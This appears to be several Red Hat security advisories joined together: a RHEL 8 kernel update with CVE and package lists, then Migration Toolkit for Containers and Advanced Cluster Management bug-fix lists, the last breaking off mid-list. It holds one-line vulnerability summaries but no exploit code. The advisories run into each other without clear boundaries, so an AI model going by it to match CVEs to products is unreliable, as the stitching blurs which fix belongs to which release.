out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c 1999544 - CVE-2021-3752 kernel: possible use-after-free in bluetooth module 1999675 - CVE-2021-3759 kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks 2000627 - CVE-2021-3744 kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd() 2000694 - CVE-2021-3772 kernel: sctp: Invalid chunks may be used to remotely remove existing associations 2004949 - CVE-2021-3773 kernel: lack of port sanity checking in natd and netfilter leads to exploit of OpenVPN clients 2009312 - Incorrect system time reported by the cpu guest statistics (PPC only). 2009521 - XFS: sync to upstream v5.11 2010463 - CVE-2021-41864 kernel: eBPF multiplication integer overflow in prealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to out-of-bounds write 2011104 - statfs reports wrong free space for small quotas 2013180 - CVE-2021-43389 kernel: an array-index-out-bounds in detach_capi_ctr in drivers/isdn/capi/kcapi.c 2014230 - CVE-2021-20322 kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed packets replies 2015525 - SCTP peel-off with SELinux and containers in OCP 2015755 - zram: zram leak with warning when running zram02.sh in ltp 2016169 - CVE-2020-13974 kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c 2017073 - CVE-2021-43056 kernel: ppc: kvm: allows a malicious KVM guest to crash the host 2017796 - ceph omnibus backport for RHEL-8.6.0 2018205 - CVE-2021-0941 kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free 2022814 - Rebase the input and HID stack in 8.6 to v5.15 2025003 - CVE-2021-43976 kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c allows an attacker to cause DoS via crafted USB device 2025726 - CVE-2021-4002 kernel: possible leak or coruption of data residing on hugetlbfs 2027239 - CVE-2021-4037 kernel: security regression for CVE-2018-13405 2029923 - CVE-2021-4083 kernel: fget: check that the fd still exists after getting a ref to it 2030476 - Kernel 4.18.0-348.2.1 secpath_cache memory leak involving strongswan tunnel 2030747 - CVE-2021-44733 kernel: use-after-free in the TEE subsystem 2031200 - rename(2) fails on subfolder mounts when the share path has a trailing slash 2034342 - CVE-2021-4157 kernel: Buffer overwrite in decode_nfs_fh function 2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks 2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses 2037019 - CVE-2022-0286 kernel: Local denial of service in bond_ipsec_add_sa 2039911 - CVE-2021-45485 kernel: information leak in the IPv6 implementation 2039914 - CVE-2021-45486 kernel: information leak in the IPv4 implementation 2042798 - [RHEL8.6][sfc] General sfc driver update 2042822 - CVE-2022-0322 kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c 2043453 - [RHEL8.6 wireless] stack & drivers general update to v5.16+ 2046021 - kernel 4.18.0-358.el8 async dirops causes write errors with namespace restricted caps 2048251 - Selinux is not allowing SCTP connection setup between inter pod communication in enforcing mode 2061700 - CVE-2021-26401 hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 2061712 - CVE-2022-0001 hw: cpu: intel: Branch History Injection (BHI) 2061721 - CVE-2022-0002 hw: cpu: intel: Intra-Mode BTI 2064855 - CVE-2022-1011 kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes

  1. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source: kernel-4.18.0-372.9.1.el8.src.rpm

aarch64: bpftool-4.18.0-372.9.1.el8.aarch64.rpm bpftool-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-4.18.0-372.9.1.el8.aarch64.rpm kernel-core-4.18.0-372.9.1.el8.aarch64.rpm kernel-cross-headers-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-core-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-devel-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-modules-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-modules-extra-4.18.0-372.9.1.el8.aarch64.rpm kernel-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-372.9.1.el8.aarch64.rpm kernel-devel-4.18.0-372.9.1.el8.aarch64.rpm kernel-headers-4.18.0-372.9.1.el8.aarch64.rpm kernel-modules-4.18.0-372.9.1.el8.aarch64.rpm kernel-modules-extra-4.18.0-372.9.1.el8.aarch64.rpm kernel-tools-4.18.0-372.9.1.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-tools-libs-4.18.0-372.9.1.el8.aarch64.rpm perf-4.18.0-372.9.1.el8.aarch64.rpm perf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm python3-perf-4.18.0-372.9.1.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm

noarch: kernel-abi-stablelists-4.18.0-372.9.1.el8.noarch.rpm kernel-doc-4.18.0-372.9.1.el8.noarch.rpm

ppc64le: bpftool-4.18.0-372.9.1.el8.ppc64le.rpm bpftool-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-4.18.0-372.9.1.el8.ppc64le.rpm kernel-core-4.18.0-372.9.1.el8.ppc64le.rpm kernel-cross-headers-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-core-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-devel-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-modules-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-modules-extra-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-372.9.1.el8.ppc64le.rpm kernel-devel-4.18.0-372.9.1.el8.ppc64le.rpm kernel-headers-4.18.0-372.9.1.el8.ppc64le.rpm kernel-modules-4.18.0-372.9.1.el8.ppc64le.rpm kernel-modules-extra-4.18.0-372.9.1.el8.ppc64le.rpm kernel-tools-4.18.0-372.9.1.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-tools-libs-4.18.0-372.9.1.el8.ppc64le.rpm perf-4.18.0-372.9.1.el8.ppc64le.rpm perf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm python3-perf-4.18.0-372.9.1.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm

s390x: bpftool-4.18.0-372.9.1.el8.s390x.rpm bpftool-debuginfo-4.18.0-372.9.1.el8.s390x.rpm kernel-4.18.0-372.9.1.el8.s390x.rpm kernel-core-4.18.0-372.9.1.el8.s390x.rpm kernel-cross-headers-4.18.0-372.9.1.el8.s390x.rpm kernel-debug-4.18.0-372.9.1.el8.s390x.rpm kernel-debug-core-4.18.0-372.9.1.el8.s390x.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.s390x.rpm kernel-debug-devel-4.18.0-372.9.1.el8.s390x.rpm kernel-debug-modules-4.18.0-372.9.1.el8.s390x.rpm kernel-debug-modules-extra-4.18.0-372.9.1.el8.s390x.rpm kernel-debuginfo-4.18.0-372.9.1.el8.s390x.rpm kernel-debuginfo-common-s390x-4.18.0-372.9.1.el8.s390x.rpm kernel-devel-4.18.0-372.9.1.el8.s390x.rpm kernel-headers-4.18.0-372.9.1.el8.s390x.rpm kernel-modules-4.18.0-372.9.1.el8.s390x.rpm kernel-modules-extra-4.18.0-372.9.1.el8.s390x.rpm kernel-tools-4.18.0-372.9.1.el8.s390x.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.s390x.rpm kernel-zfcpdump-4.18.0-372.9.1.el8.s390x.rpm kernel-zfcpdump-core-4.18.0-372.9.1.el8.s390x.rpm kernel-zfcpdump-debuginfo-4.18.0-372.9.1.el8.s390x.rpm kernel-zfcpdump-devel-4.18.0-372.9.1.el8.s390x.rpm kernel-zfcpdump-modules-4.18.0-372.9.1.el8.s390x.rpm kernel-zfcpdump-modules-extra-4.18.0-372.9.1.el8.s390x.rpm perf-4.18.0-372.9.1.el8.s390x.rpm perf-debuginfo-4.18.0-372.9.1.el8.s390x.rpm python3-perf-4.18.0-372.9.1.el8.s390x.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.s390x.rpm

x86_64: bpftool-4.18.0-372.9.1.el8.x86_64.rpm bpftool-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-4.18.0-372.9.1.el8.x86_64.rpm kernel-core-4.18.0-372.9.1.el8.x86_64.rpm kernel-cross-headers-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-core-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-devel-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-modules-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-modules-extra-4.18.0-372.9.1.el8.x86_64.rpm kernel-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-372.9.1.el8.x86_64.rpm kernel-devel-4.18.0-372.9.1.el8.x86_64.rpm kernel-headers-4.18.0-372.9.1.el8.x86_64.rpm kernel-modules-4.18.0-372.9.1.el8.x86_64.rpm kernel-modules-extra-4.18.0-372.9.1.el8.x86_64.rpm kernel-tools-4.18.0-372.9.1.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-tools-libs-4.18.0-372.9.1.el8.x86_64.rpm perf-4.18.0-372.9.1.el8.x86_64.rpm perf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm python3-perf-4.18.0-372.9.1.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64: bpftool-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-372.9.1.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm kernel-tools-libs-devel-4.18.0-372.9.1.el8.aarch64.rpm perf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.aarch64.rpm

ppc64le: bpftool-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-372.9.1.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm kernel-tools-libs-devel-4.18.0-372.9.1.el8.ppc64le.rpm perf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.ppc64le.rpm

x86_64: bpftool-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-372.9.1.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm kernel-tools-libs-devel-4.18.0-372.9.1.el8.x86_64.rpm perf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-372.9.1.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2020-0404 https://access.redhat.com/security/cve/CVE-2020-4788 https://access.redhat.com/security/cve/CVE-2020-13974 https://access.redhat.com/security/cve/CVE-2020-27820 https://access.redhat.com/security/cve/CVE-2021-0941 https://access.redhat.com/security/cve/CVE-2021-3612 https://access.redhat.com/security/cve/CVE-2021-3669 https://access.redhat.com/security/cve/CVE-2021-3743 https://access.redhat.com/security/cve/CVE-2021-3744 https://access.redhat.com/security/cve/CVE-2021-3752 https://access.redhat.com/security/cve/CVE-2021-3759 https://access.redhat.com/security/cve/CVE-2021-3764 https://access.redhat.com/security/cve/CVE-2021-3772 https://access.redhat.com/security/cve/CVE-2021-3773 https://access.redhat.com/security/cve/CVE-2021-4002 https://access.redhat.com/security/cve/CVE-2021-4037 https://access.redhat.com/security/cve/CVE-2021-4083 https://access.redhat.com/security/cve/CVE-2021-4157 https://access.redhat.com/security/cve/CVE-2021-4197 https://access.redhat.com/security/cve/CVE-2021-4203 https://access.redhat.com/security/cve/CVE-2021-20322 https://access.redhat.com/security/cve/CVE-2021-21781 https://access.redhat.com/security/cve/CVE-2021-26401 https://access.redhat.com/security/cve/CVE-2021-29154 https://access.redhat.com/security/cve/CVE-2021-37159 https://access.redhat.com/security/cve/CVE-2021-41864 https://access.redhat.com/security/cve/CVE-2021-42739 https://access.redhat.com/security/cve/CVE-2021-43056 https://access.redhat.com/security/cve/CVE-2021-43389 https://access.redhat.com/security/cve/CVE-2021-43976 https://access.redhat.com/security/cve/CVE-2021-44733 https://access.redhat.com/security/cve/CVE-2021-45485 https://access.redhat.com/security/cve/CVE-2021-45486 https://access.redhat.com/security/cve/CVE-2022-0001 https://access.redhat.com/security/cve/CVE-2022-0002 https://access.redhat.com/security/cve/CVE-2022-0286 https://access.redhat.com/security/cve/CVE-2022-0322 https://access.redhat.com/security/cve/CVE-2022-1011 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.6_release_notes/

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYnqSF9zjgjWX9erEAQjBXQ/8DSpFUMNN6ZVFtli2KuVowVLS+14J0jtj 0zxpr0skJT8vVulU3VTeURBMdg9NAo9bj3R5KTk2+dC+AMuHET5aoVvaYmimBGKL 5qzpu7q9Z0aaD2I288suHCnYuRJnt+qKZtNa4hlcY92bN0tcYBonxsdIS2xM6xIu GHNS8HNVUNz4PuCBfmbITvgX9Qx+iZQVlVccDBG5LDpVwgOtnrxHKbe5E499v/9M oVoN+eV9ulHAZdCHWlUAahbsvEqDraCKNT0nHq/xO5dprPjAcjeKYMeaICtblRr8 k+IouGywaN+mW4sBjnaaiuw2eAtoXq/wHisX1iUdNkroqcx9NBshWMDBJnE4sxQJ ZOSc8B6yjJItPvUI7eD3BDgoka/mdoyXTrg+9VRrir6vfDHPrFySLDrO1O5HM5fO 3sExCVO2VM7QMCGHJ1zXXX4szk4SV/PRsjEesvHOyR2xTKZZWMsXe1h9gYslbADd tW0yco/G23xjxqOtMKuM/nShBChflMy9apssldiOfdqODJMv5d4rRpt0xgmtSOM6 qReveuQCasmNrGlAHgDwbtWz01fmSuk9eYDhZNmHA3gxhoHIV/y+wr0CLbOQtDxT p79nhiqwUo5VMj/X30Lu0Wl3ptLuhRWamzTCkEEzdubr8aVsT4RRNQU3KfVFfpT1 MWp/2ui3i80= =Fdgy -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 8) - x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Summary:

The Migration Toolkit for Containers (MTC) 1.7.2 is now available. Description:

The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):

2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes 2038898 - [UI] ?Update Repository? option not getting disabled after adding the Replication Repository details to the MTC web console 2040693 - ?Replication repository? wizard has no validation for name length 2040695 - [MTC UI] ?Add Cluster? wizard stucks when the cluster name length is more than 63 characters 2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor 2048537 - Exposed route host to image registry? connecting successfully to invalid registry ?xyz.com? 2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak 2055658 - [MTC UI] Cancel button on ?Migrations? page does not disappear when migration gets Failed/Succeeded with warnings 2056962 - [MTC UI] UI shows the wrong migration type info after changing the target namespace 2058172 - [MTC UI] Successful Rollback is not showing the green success icon in the ?Last State? field. 2058529 - [MTC UI] Migrations Plan is missing the type for the state migration performed before upgrade 2061335 - [MTC UI] ?Update cluster? button is not getting disabled 2062266 - MTC UI does not display logs properly [OADP-BL] 2062862 - [MTC UI] Clusters page behaving unexpectedly on deleting the remote cluster?s service account secret from backend 2074675 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x 2076593 - Velero pod log missing from UI drop down 2076599 - Velero pod log missing from downloaded logs folder [OADP-BL] 2078459 - [MTC UI] Storageclass conversion plan is adding migstorage reference in migplan 2079252 - [MTC] Rsync options logs not visible in log-reader pod 2082221 - Don't allow Storage class conversion migration if source cluster has only one storage class defined [UI] 2082225 - non-numeric user when launching stage pods [OADP-BL] 2088022 - Default CPU requests on Velero/Restic are too demanding making scheduling fail in certain environments 2088026 - Cloud propagation phase in migration controller is not doing anything due to missing labels on Velero pods 2089126 - [MTC] Migration controller cannot find Velero Pod because of wrong labels 2089411 - [MTC] Log reader pod is missing velero and restic pod logs [OADP-BL] 2089859 - [Crane] DPA CR is missing the required flag - Migration is getting failed at the EnsureCloudSecretPropagated phase due to the missing secret VolumeMounts 2090317 - [MTC] mig-operator failed to create a DPA CR due to null values are passed instead of int [OADP-BL] 2096939 - Fix legacy operator.yml inconsistencies and errors 2100486 - [MTC UI] Target storage class field is not getting respected when clusters don't have replication repo configured. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.5.0 images

Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html/release_notes/

Security fixes:

  • nodejs-json-schema: Prototype pollution vulnerability (CVE-2021-3918)

  • containerd: Unprivileged pod may bind mount any privileged regular file on disk (CVE-2021-43816)

  • minio: user privilege escalation in AddUser() admin API (CVE-2021-43858)

  • openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates (CVE-2022-0778)

  • imgcrypt: Unauthorized access to encryted container image on a shared system due to missing check in CheckAuthorization() code path (CVE-2022-24778)

  • golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)

  • node-fetch: exposure of sensitive information to an unauthorized actor (CVE-2022-0235)

  • nconf: Prototype pollution in memory store (CVE-2022-21803)

  • golang: crypto/elliptic IsOnCurve returns true for invalid field elements (CVE-2022-23806)

  • nats-server: misusing the "dynamically provisioned sandbox accounts" feature authenticated user can obtain the privileges of the System account (CVE-2022-24450)

  • Moment.js: Path traversal in moment.locale (CVE-2022-24785)

  • golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)

  • go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses (CVE-2022-29810)

  • opencontainers: OCI manifest and index parsing confusion (CVE-2021-41190)

Bug fixes:

  • RFE Copy secret with specific secret namespace, name for source and name, namespace and cluster label for target (BZ# 2014557)

  • RHACM 2.5.0 images (BZ# 2024938)

  • [UI] When you delete host agent from infraenv no confirmation message appear (Are you sure you want to delete x?) (BZ#2028348)

  • Clusters are in 'Degraded' status with upgrade env due to obs-controller not working properly (BZ# 2028647)

  • create cluster pool -> choose infra type, As a result infra providers disappear from UI. (BZ# 2033339)

  • Restore/backup shows up as Validation failed but the restore backup status in ACM shows success (BZ# 2034279)

  • Observability - OCP 311 node role are not displayed completely (BZ# 2038650)

  • Documented uninstall procedure leaves many leftovers (BZ# 2041921)

  • infrastructure-operator pod crashes due to insufficient privileges in ACM 2.5 (BZ# 2046554)

  • Acm failed to install due to some missing CRDs in operator (BZ# 2047463)

  • Navigation icons no longer showing in ACM 2.5 (BZ# 2051298)

  • ACM home page now includes /home/ in url (BZ# 2051299)

  • proxy heading in Add Credential should be capitalized (BZ# 2051349)

  • ACM 2.5 tries to create new MCE instance when install on top of existing MCE 2.0 (BZ# 2051983)

  • Create Policy button does not work and user cannot use console to create policy (BZ# 2053264)

  • No cluster information was displayed after a policyset was created (BZ# 2053366)

  • Dynamic plugin update does not take effect in Firefox (BZ# 2053516)

  • Replicated policy should not be available when creating a Policy Set (BZ# 2054431)

  • Placement section in Policy Set wizard does not reset when users click "Back" to re-configured placement (BZ# 2054433)

  • Bugs fixed (https://bugzilla.redhat.com/):

2014557 - RFE Copy secret with specific secret namespace, name for source and name, namespace and cluster label for target 2024702 - CVE-2021-3918 nodejs-json-schema: Prototype pollution vulnerability 2024938 - CVE-2021-41190 opencontainers: OCI manifest and index parsing confusion 2028224 - RHACM 2.5.0 images 2028348 - [UI] When you delete host agent from infraenv no confirmation message appear (Are you sure you want to delete x?) 2028647 - Clusters are in 'Degraded' status with upgrade env due to obs-controller not working properly 2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic 2033339 - create cluster pool -> choose infra type , As a result infra providers disappear from UI. 2034279 - Restore/backup shows up as Validation failed but the restore backup status in ACM shows success 2036252 - CVE-2021-43858 minio: user privilege escalation in AddUser() admin API 2038650 - Observability - OCP 311 node role are not displayed completely 2041921 - Documented uninstall procedure leaves many leftovers 2044434 - CVE-2021-43816 containerd: Unprivileged pod may bind mount any privileged regular file on disk 2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor 2046554 - infrastructure-operator pod crashes due to insufficient privileges in ACM 2.5 2047463 - Acm failed to install due to some missing CRDs in operator 2051298 - Navigation icons no longer showing in ACM 2.5 2051299 - ACM home page now includes /home/ in url 2051349 - proxy heading in Add Credential should be capitalized 2051983 - ACM 2.5 tries to create new MCE instance when install on top of existing MCE 2.0 2052573 - CVE-2022-24450 nats-server: misusing the "dynamically provisioned sandbox accounts" feature authenticated user can obtain the privileges of the System account 2053264 - Create Policy button does not work and user cannot use console to create policy 2053366 - No cluster information was displayed after a policyset was created 2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements 2053516 - Dynamic plugin update does not take effect in Firefox 2054431 - Replicated policy should not be available when creating a Policy Set 2054433 - Placement section in Policy Set wizard does not reset when users click "Back" to re-configured placement 2054772 - credentialName is not parsed correctly in UI notifications/alerts when creating/updating a discovery config 2054860 - Cluster overview page crashes for on-prem cluster 2055333 - Unable to delete assisted-service operator 2055900 - If MCH is installed on existing MCE and both are in multicluster-engine namespace , uninstalling MCH terminates multicluster-engine namespace 2056485 - [UI] In infraenv detail the host list don't have pagination 2056701 - Non platform install fails agentclusterinstall CRD is outdated in rhacm2.5 2057060 - [CAPI] Unable to create ClusterDeployment due to service account restrictions (ACM + Bundled Assisted) 2058435 - Label cluster.open-cluster-management.io/backup-cluster stamped 'unknown' for velero backups 2059779 - spec.nodeSelector is missing in MCE instance created by MCH upon installing ACM on infra nodes 2059781 - Policy UI crashes when viewing details of configuration policies for backupschedule that does not exist 2060135 - [assisted-install] agentServiceConfig left orphaned after uninstalling ACM 2060151 - Policy set of the same name cannot be re-created after the previous one has been deleted 2060230 - [UI] Delete host modal has incorrect host's name populated 2060309 - multiclusterhub stuck in installing on "ManagedClusterConditionAvailable" [intermittent] 2060469 - The development branch of the Submariner addon deploys 0.11.0, not 0.12.0 2060550 - MCE installation hang due to no console-mce-console deployment available 2060603 - prometheus doesn't display managed clusters 2060831 - Observability - prometheus-operator failed to start on KS 2060934 - Cannot provision AWS OCP 4.9 cluster from Power Hub 2061260 - The value of the policyset placement should be filtered space when input cluster label expression 2061311 - Cleanup of installed spoke clusters hang on deletion of spoke namespace 2061659 - the network section in create cluster -> Networking include the brace in the network title 2061798 - [ACM 2.5] The service of Cluster Proxy addon was missing 2061838 - ACM component subscriptions are removed when enabling spec.disableHubSelfManagement in MCH 2062009 - No name validation is performed on Policy and Policy Set Wizards 2062022 - cluster.open-cluster-management.io/backup-cluster of velero schedules should populate the corresponding hub clusterID 2062025 - No validation is done on yaml's format or content in Policy and Policy Set wizards 2062202 - CVE-2022-0778 openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates 2062337 - velero schedules get re-created after the backupschedule is in 'BackupCollision' phase 2062462 - Upgrade to 2.5 hang due to irreconcilable errors of grc-sub and search-prod-sub in MCH 2062556 - Always return the policyset page after created the policy from UI 2062787 - Submariner Add-on UI does not indicate on Broker error 2063055 - User with cluserrolebinding of open-cluster-management:cluster-manager-admin role can't see policies and clusters page 2063341 - Release imagesets are missing in the console for ocp 4.10 2063345 - Application Lifecycle- UI shows white blank page when the page is Refreshed 2063596 - claim clusters from clusterpool throws errors 2063599 - Update the message in clusterset -> clusterpool page since we did not allow to add clusterpool to clusterset by resourceassignment 2063697 - Observability - MCOCR reports object-storage secret without AWS access_key in STS enabled env 2064231 - Can not clean the instance type for worker pool when create the clusters 2064247 - prefer UI can add the architecture type when create the cluster 2064392 - multicloud oauth-proxy failed to log users in on web 2064477 - Click at "Edit Policy" for each policy leads to a blank page 2064509 - No option to view the ansible job details and its history in the Automation wizard after creation of the automation job 2064516 - Unable to delete an automation job of a policy 2064528 - Columns of Policy Set, Status and Source on Policy page are not sortable 2064535 - Different messages on the empty pages of Overview and Clusters when policy is disabled 2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server 2064722 - [Tracker] [DR][ACM 2.5] Applications are not getting deployed on managed cluster 2064899 - Failed to provision openshift 4.10 on bare metal 2065436 - "Filter" drop-down list does not show entries of the policies that have no top-level remediation specified 2066198 - Issues about disabled policy from UI 2066207 - The new created policy should be always shown up on the first line 2066333 - The message was confuse when the cluster status is Running 2066383 - MCE install failing on proxy disconnected environment 2066433 - Logout not working for ACM 2.5 2066464 - console-mce-console pods throw ImagePullError after upgrading to ocp 4.10 2066475 - User with view-only rolebinding should not be allowed to create policy, policy set and automation job 2066544 - The search box can't work properly in Policies page 2066594 - RFE: Can't open the helm source link of the backup-restore-enabled policy from UI 2066650 - minor issues in cluster curator due to the startup throws errors 2066751 - the image repo of application-manager did not updated to use the image repo in MCE/MCH configuration 2066834 - Hibernating cluster(s) in cluster pool stuck in 'Stopping' status after restore activation 2066842 - cluster pool credentials are not backed up 2066914 - Unable to remove cluster value during configuration of the label expressions for policy and policy set 2066940 - Validation fired out for https proxy when the link provided not starting with https 2066965 - No message is displayed in Policy Wizard to indicate a policy externally managed 2066979 - MIssing groups in policy filter options comparing to previous RHACM version 2067053 - I was not able to remove the image mirror content when create the cluster 2067067 - Can't filter the cluster info when clicked the cluster in the Placement section 2067207 - Bare metal asset secrets are not backed up 2067465 - Categories,Standards, and Controls annotations are not updated after user has deleted a selected template 2067713 - Columns on policy's "Results" are not sort-able as in previous release 2067728 - Can't search in the policy creation or policyset creation Yaml editor 2068304 - Application Lifecycle- Replicasets arent showing the logs console in Topology 2068309 - For policy wizard in dynamics plugin environment, buttons at the bottom should be sticky and the contents of the Policy should scroll 2068312 - Application Lifecycle - Argo Apps are not showing overview details and topology after upgrading from 2.4 2068313 - Application Lifecycle - Refreshing overview page leads to a blank page 2068328 - A cluster's "View history" page should not contain all clusters' violations history 2068387 - Observability - observability operator always CrashLoopBackOff in FIPS upgrading hub 2068993 - Observability - Node list is not filtered according to nodeType on OCP 311 dashboard 2069329 - config-policy-controller addon with "Unknown" status in OCP 3.11 managed cluster after upgrade hub to 2.5 2069368 - CVE-2022-24778 imgcrypt: Unauthorized access to encryted container image on a shared system due to missing check in CheckAuthorization() code path 2069469 - Status of unreachable clusters is not reported in several places on GRC panels 2069615 - The YAML editor can't work well when login UI using dynamic console plugin 2069622 - No validation for policy template's name 2069698 - After claim a cluster from clusterpool, the cluster pages become very very slow 2069867 - Error occurs when trying to edit an application set/subscription 2069870 - ACM/MCE Dynamic Plugins - 404: Page Not Found Error Occurs - intermittent crashing 2069875 - Cluster secrets are not being created in the managed cluster's namespace 2069895 - Application Lifecycle - Replicaset and Pods gives error messages when Yaml is selected on sidebar 2070203 - Blank Application is shown when editing an Application with AnsibleJobs 2070782 - Failed Secret Propagation to the Same Namespace as the AnsibleJob CR 2070846 - [ACM 2.5] Can't re-add the default clusterset label after removing it from a managedcluster on BM SNO hub 2071066 - Policy set details panel does not work when deployed into namespace different than "default" 2071173 - Configured RunOnce automation job is not displayed although the policy has no violation 2071191 - MIssing title on details panel after clicking "view details" of a policy set card 2071769 - Placement must be always configured or error is reported when creating a policy 2071818 - ACM logo not displayed in About info modal 2071869 - Topology includes the status of local cluster resources when Application is only deployed to managed cluster 2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale 2072097 - Local Cluster is shown as Remote on the Application Overview Page and Single App Overview Page 2072104 - Inconsistent "Not Deployed" Icon Used Between 2.4 and 2.5 as well as the Overview and Topology 2072177 - Cluster Resource Status is showing App Definition Statuses as well 2072227 - Sidebar Statuses Need to Be Updated to Reflect Cluster List and Cluster Resource Statuses 2072231 - Local Cluster not included in the appsubreport for Helm Applications Deployed on All Clusters 2072334 